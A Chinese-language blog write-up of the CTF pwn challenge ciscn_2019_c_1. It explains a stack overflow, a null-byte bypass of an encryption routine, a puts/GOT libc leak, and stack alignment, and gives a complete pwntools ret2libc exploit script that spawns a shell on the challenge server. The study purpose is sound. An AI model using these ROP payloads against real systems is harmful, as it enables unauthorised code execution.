weiteUP-ciscn_2019_c_1

已于 2022-11-04 12:09:50 修改
阅读量1.4k 收藏 11
点赞数 2
文章标签: 系统安全
于 2022-08-07 21:30:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52111404/article/details/126150313
版权

声明:本文用途为供自己学习
参考博文一:CSDN-半步行止(作者)-ciscn_2019_c_1
参考博文二:CSDN-Angel~Yan(作者)-[BUUCTF]PWN6——ciscn_2019_c_1
参考博文三:博客园-ZIKH26(作者)-关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题

目录

一、思路

enter description here
main函数:
enter description here
encrrypt函数:
enter description here

encrypt函数中存在gets函数,本题中没有canary保护所以可以栈溢出,而后面的伪代码表示会对输入的每一个字符进行加密,即意图让的输入发生改变,如此就不能保证输入的payload达到攻击目的。而strlen函数的返回值为遇到第一个'\0'时的字符串长度,例如"q\0abcd"的长度为1。因此输入的字符串如果存在\0,则其第一个\0后的内容不会被加密(修改),即借此可以正常构造payload,此题中没有system('/bin/sh'),不能ret2system,用ret2libc构造ROP链的方法达到攻击目的。system/bin/sh都能够在libc中找到,通过puts函数泄露puts函数的真实地址(puts.got.plt的内容),计算处libc基质进一步得出system函数和/bin/sh在程序运行时真实地址,注意:此时要保证栈平衡(后面会涉及改内容,详见参考博文三)。

二、攻击过程

(一)泄露puts函数的真实地址

enter description here
由于该程序采用动态链接,只有在程序运行时才会进行重定位操作(这部分略,不去学习相关内容还是不会理解),由于RELRO保护,在本地文件中直接找到的puts函数pltgot表的地址并非在运行时的地址,got表一开始是没有存放该真实地址,因此需要在程序运行时确定。而puts函数的作用是打印参数内容,如果把栈溢出时的返回地址篡改为puts函数的地址(为什么这里用plt而不可以用got????有待探究),且把puts的参数设置为puts.got.plt的地址,则该地址内的内容就会被打印出,而该地址内由于puts函数之前已经加载过了,因此该地址内内容为put函数在程序运行时的真实地址。
(由于程序开启了RELRO保护,因此puts_got的值每次运行时不一样,因此还需要把)
以下代码参考:CSDN-Angel~Yan(作者)-[BUUCTF]PWN6——ciscn_2019_c_1

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']

payload=b'\0'+b'a'*(0x50-1+8)   #首位填‘\0’,绕过加密,之后填上a覆盖到返回地址
payload+=p64(pop_rdi_ret) #设置rdi寄存器的值为puts的got表地址
payload+=p64(puts_got)   #调用puts函数,输出的是puts的got表地址
payload+=p64(puts_plt)    #设置返回地址,上述步骤完成了输出了puts函数的地址,我们得控制程序执行流
payload+=p64(main)      #让它返回到main函数,这样我们才可以再一次利用输入点构造rop 

io.sendlineafter(b"Input your choice!\n",b'1')                  
io.sendlineafter(b'encrypted\n',payload)
io.recvline()
io.recvline()

puts_addr=u64(io.recvuntil(b'\n')[:-1].ljust(8,b'\0'))#接收程序返回的地址#lijust(8,'\0'),不满8位的用0补足
print(hex(puts_addr))

(二)利用LibcSearcher获取libc基址

1.LibcSearcher模块下载安装教程
cd ~
git clone https://github.com/lieanu/LibcSearcher.git
cd LibcSearcher
python3 setup.py install

如果直接运行python exp.py提示"No module named LibcSearcher",需要将LibcSearcher.py 复制到当前工作目录。
附:在线libc库查询网站(根据外部函数真实地址(十六进制格式)最后三位查询)(如puts函数运行时真实地址为0x7f3d534819c0,则输入9c0,原理见下一条目)
enter description here

2.LibcSearcher原理浅析

参考博文:CSDN-半步行止(作者)-ciscn_2019_c_1
低三位决定libc的版本号,这是由分页机制决定的,以下是“半步行止”对于“北岛静石”的引用。目前我没有找到有关“北岛静石”对于libc版本的阐述,今后找到相关libc版本阐述的说法会更新此处。

北岛静石师傅:
不同libc版本代码会有修改, 导致它基地址会发生改变
然后由于页对齐机制
4kb为一页
4kb=4*1024=2^12=0x1000
所有页都是这样对齐的, 所以在分配给动态链接库的时候
不会影响到低三字节
由此可以确定版本信息了
那种分配给动态链接库的内存, 也是n个页
n*0x1000怎么样都不会影响低三字节的
3.利用libc得到system(“/bin/sh”)

(下图中write即为本题中puts
libc.so文件中putswrite)函数和system函数分布的示意图:
在这里插入图片描述
目标攻击文件在内存中中(运行时)的布局及各函数的布局(与上图对应如下)示意图如下:
(ps:上图自上到下是由低地址到高地址,下图相反:自上到下是由高地址到低地址)
在这里插入图片描述

(1)利用LibcSearcher

使用以下代码:
大致原理见上两张图

libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
sys_addr=libc_base+libc.dump('system')
binsh_addr=libc_base+libc.dump('str_bin_sh')
(2)利用已知的libc库

使用以下代码:

libc=ELF('././libc-2.27.so')
libc_base=puts_addr-libc.symbols('puts')
sys_addr=libc_base+libc.symbols('system')
binsh_addr=libc_base+ libc.search('/bin/sh').next()

(三)利用ROP使用system(‘/bin/sh’)得到shell

1.构造的gadget链
pop_rdi_ret = 0x400c83
ret_addr = 0x4006b9
payload2 = b'\0' + b'a' * (0x50 - 1 + 0x8) + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh) + p64(sys_addr)
2.构造gadget链的思路
(1).pop rdi ; ret

由于本程序是64位程序,函数传递参数时第一个参数放在rdi寄存器中,所以在返回ret system函数之前,需要将rdi寄存器设置为字符串"/bin/sh"(的地址),所以gadget需要pop rdi,而如果没有一个紧跟着pop rdiret程序可能会异常终止,因此寻找的gadgetpop rdi;ret
使用pwntools自带的ROPgadget工具,利用如下代码,可以得到需要的gadget的地址,选择下图标记的地址:
(ps:如果程序开启了PIE保护,则不能够使用ROPgadget工具,这是因为ROPgadget分析的仅仅是本地的二进制文件)

 ROPgadget --binary ciscn_2019_c_1 --only "pop | ret"

在这里插入图片描述

(2)puts_plt、puts_got
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
(3)ret

关于为什么要加入ret:平衡栈、执行system函数前栈要16字节对齐。参考博文:博客园-ZIKH26(作者)-关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题

为什么执行system函数要栈对齐
64位ubuntu18以上系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐。

就是说,调用system函数时,system对应的栈的地址必须是16的倍数。

如果执行system的时候没有对齐怎么办?
如果执行了一个对栈地址的操作指令(比如pop,ret,push等等,但如果是mov这样的则不算对栈的操作指令),那么栈地址就会+8或是-8。为使rsp对齐16字节,核心思想就是增加或减少栈内容,使rsp地址能相应的增加或减少8字节,这样就能够对齐16字节了。因为栈中地址都是以0或8结尾,0已经对齐16字节,因此只需要进行奇数次pop或push操作,就能把地址是8结尾的rsp变为0结尾,使其16字节对齐。

这时候有两种解决方法。

1、去将system函数地址+1,此处的+1,即是把地址+1,也可以理解为

+1是为了跳过一条栈操作指令(函数的第一条指令一般都是push rbp,我们的目的就是跳过一条栈操作指令,使rsp十六字节对齐,跳过一条指令,自然就是把8变成0了)

2、直接在调用system函数地址之前去调用一个ret指令。因为本来现在是没有对齐的,那我现在直接执行一条对栈操作指令(ret指令等同于pop rip,该指令使得rsp+8,从而完成rsp16字节对齐),这样system地址所在的栈地址就是0结尾,从而完成了栈对齐。

(自言自语:也许在本程序执行时,在执行本来应该ret addr时,栈(地址)应该就不是16字节对齐的,而执行过p64(pop_rdi_ret) + p64(bin_sh) + p64(sys_addr)这个后,栈相对于原来增减了8*3,即奇数个8字节,所以在执行ret system时栈依然没有16字节对齐)

三、攻击脚本

from pwn import *
from LibcSearcher import *
context(os = 'linux', arch = 'amd64', log_level = 'debug')
ifRemote = 1
if ifRemote:
	io = remote("node4.buuoj.cn",26773)
else:
	io = process("./ciscn_2019_c_1")

elf = ELF("ciscn_2019_c_1")
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
pop_rdi_ret = 0x400c83
payload=b'\0'+b'a'*(0x50-1+8)   #首位填‘\0’,绕过加密,之后填上a覆盖到返回地址
payload+=p64(pop_rdi_ret) #设置rdi寄存器的值为puts的got表地址
payload+=p64(puts_got)   #调用puts函数,输出的是puts的got表地址
payload+=p64(puts_plt)    #设置返回地址,上述步骤完成了输出了puts函数的地址,我们得控制程序执行流
payload+=p64(main)      #让它返回到main函数,这样我们才可以再一次利用输入点构造rop 
io.sendlineafter(b"Input your choice!\n",b'1')                  
io.sendlineafter(b'encrypted\n',payload)
io.recvline()
io.recvline()
puts_addr=u64(io.recvuntil(b'\n')[:-1].ljust(8,b'\0'))#接收程序返回的地址#lijust(8,'\0'),不满8位的用0补足
print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)  #利用LibcSearcher模块找到匹配的libc版本
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

io.sendlineafter(b"Input your choice!\n",b'1') 
ret_addr = 0x4006b9
payload2 = b'\0' + b'a' * (0x50 - 1 + 0x8) + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh) + p64(sys_addr)
# sleep(1) ## 不是必要加 ,但有时候要加
io.sendlineafter(b'encrypted\n',payload2)
io.interactive()

四、遇到的问题

(一)不理解栈平衡原理

一开始不明白为什么在payload2中的gadget链中要加入ret_addr,后来知道时和system函数有关,找了几篇博文,解决了此问题。推荐博文:参考博文三:博客园-ZIKH26(作者)-关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题
其他博文:
参考博文三:CSDN-小手琴师(作者)-x86_64汇编中的栈平衡(内平栈外平栈)附od反汇编图解

(二)LibcSearcher找libc版本的原理

LibcSearcher通过程序引用libc.so中的函数在程序运行时的真实地址(16进制)的低三位来判断libc版本,本文中通过“半步行止”的博文并没有理解透彻。

(三)关于sleep(0)什么时候加的问题

(四)对于payload中plt和got地址的选择理解不清

payload=b'\0'+b'a'*(0x50-1+8)   #首位填‘\0’,绕过加密,之后填上a覆盖到返回地址
payload+=p64(pop_rdi_ret) #设置rdi寄存器的值为puts的got表地址
payload+=p64(puts_got)   #调用puts函数,输出的是puts的got表地址
payload+=p64(puts_plt)

为什么puts_plt不能用puts_got?(本人猜测是在plt表中还有些有关函数执行的操作,而got表里差不多只有函数的真实地址,不能够支撑函数运行??,有待后续研究)

五、总结反思

(一)还需要对找Libc版本的方法进行深入探究

(二)要搞明白为什么payload中第一次puts要用plt。

irontys
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 243
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
LibcSearcher--匹配libc版本的神器
Assassin
04-06 8816
文章目录**一、简介****二、安装****版本一:本地判断libc的方法****版本二:在线使用webAPI的方式****三、关于本地libc文件的更新问题****四、使用方法** 一、简介 LibcSearcher是python的一个库,用于解决pwn中不明libc版本的情况,可以根据泄露的某函数地址,推测服务端使用的libc版本,是做题必备的神器。 根据网上的版本,我总结两个可以利用的方法 二、安装 版本一:本地判断libc的方法 使用原作者的版本即可,安装指令如下 git clone https
安装LibcSearcher的方法
neuisf的博客
01-04 1万+
在练习Pwn过程中,要用到python的一个库,叫做LibcSearcher,安装方法如下: 1.git clone https://github.com/lieanu/LibcSearcher.git 2.cd LibcSearcher 3.python setup.py install 4.直接运行python exp.py会提示“No module named LibcSearche...
ModuleNotFoundError: No module namedlibc‘ 的解决方法
yuezhilanyi的博客
07-07 739
ModuleNotFoundError: No module named 'libc'TLDR TLDR 从 from libc.math import sqrt 改为 from libc.math cimport sqrt 注意是cimport而不是import
CTFshow-PWN-前置基础(pwn24-pwn25)
最新发布
Welcome To Myon'Blog !
04-20 503
你可以使用pwntools的shellcraft模块来进行攻击32位程序,只开了部分 RELRO 保护可以看到多出了一个 RWX: Has RWX segments这意味着二进制文件中存在至少一个段(通常是代码段),它同时拥有读、写、执行权限反编译尝试跟进 ctfshow 函数但是不行这个是它的汇编代码:使用 python 运行:拿到 shell执行命令拿到 flag:ctfshow{f615f3c6-b99a-4590-ac95-1f7baf5b974b}
ciscn_2019_c_1
NANMUZN的博客
03-28 111
嘻嘻
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1260
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 370
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
LibcSearcher.zip
06-09
项目地址:https://github.com/lieanu/LibcSearcher,因为依赖于庞大的https://github.com/lieanu/libc-database,大概有490M左右
LibcSearcher添加kali自带libc
菜的只能随便写写博客
02-18 1713
LibcSearcher是一个pwn中比较好用的libc版本搜寻,并且带有libc-database,使用kali或者其他linux调试的时候,需要使用本机的libc文件,下面说一说怎么查找本机的libc和添加libc。 查看本机使用libc 以上分别是64位和32位的libc文件所在。 添加libc 找到LibcSearcher所在路径的libc-database文件夹下面,具体使用方法参...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
安装LibcSearcher
qq_44768749的博客
08-21 1500
安装LibcSearcher git clone加速方法:将github.com 换为github.com.cnpmjs.org即可实现加速 git clone https://github.com.cnpmjs.org/lieanu/LibcSearcher.git cd LibcSearcher python setup.py install
LibcSearch报错 LibcSearcher找不到合适libc 最新解决方案
csdn546229768的博客
11-06 3079
如果大家在执行Libcsearch 的pyload时发生报错信息翻译过来时找不到适合的libc,这是因为极大可能你使用的环境是python3而你参照网上的pwn环境搭建时,你下载的LibcSearch它不支持py3!! 解决方式:用pip3下载另一个大佬更新的版本 命令如下: pip3 install LibcSearcher 安装完成后用py3运行payload,由原来的本地libc查找改为了云端,也就是说需要联网才可以执行这个库,但是不影响平时练习,除非你进入了CTF决赛。。 我安装新版后用py3执行
关于Linux下ImportError: No module named msvcrt
weixin_34163553的博客
11-11 2874
msvcrt 是C语言下的库,在Linux下可以用glibc或者libc 具体介绍可以参考: C运行库和C标准库的关系 C标准库,顾名思义既然是标准,就是由标准组织制定的。是由“美国国家标准协会(American National Standards Institute,ANSI)”为了规范C语言库而制定的标准。在最初,各个大学各个公司使用...
gdb工具pwndbg与peda与gef
ACdream
02-07 1万+
在调试时有时候需要不同功能,在gdb下需要安装两个工具pwndbg和peda,可惜这两个不兼容 pwndbg在调试堆的数据结构时候很方便 peda在查找字符串等功能时方便 安装pwndbg: git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh 安装peda: git clone https://git...
python模块以及导入出现ImportError: No module named 'xxx'问题
热门推荐
我的新博客
02-23 57万+
python中,每个py文件被称之为模块,每个具有__init__.py文件的目录被称为包。只要模 块或者包所在的目录在sys.path中,就可以使用import 模块或import 包来使用 如果你要使用的模块(py文件)和当前模块在同一目录,只要import相应的文件名就好,比 如在a.py中使用b.py:  import b  但是如果要import一个不同目录的文件(例如b.
通用gadget详解
weixin_44932880的博客
12-26 7282
gadget 利用gadget是做pwn题时控制程序流程一种重要且常用的方法。 rop是什么? 参考链接 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/ 我今天主要写我对通用gadget的原理的理解 通用 gadget 通用gadget之所以叫通用,说明这是可以广泛使用的。 本人理解: 程序编译...
LibcSearcher
07-16
LibcSearcher是一个用于解决CTF比赛中pwn题目中libc库版本不一致带来的问题的工具。它可以通过泄漏的函数地址来确定libc库的版本,并提供与该版本匹配的函数地址和偏移。这样可以帮助我们在利用漏洞时快速定位正确的系统函数,提高攻击的成功率。LibcSearcher可以通过解析libc库文件,查找库中的符号地址和偏移,从而实现这个功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值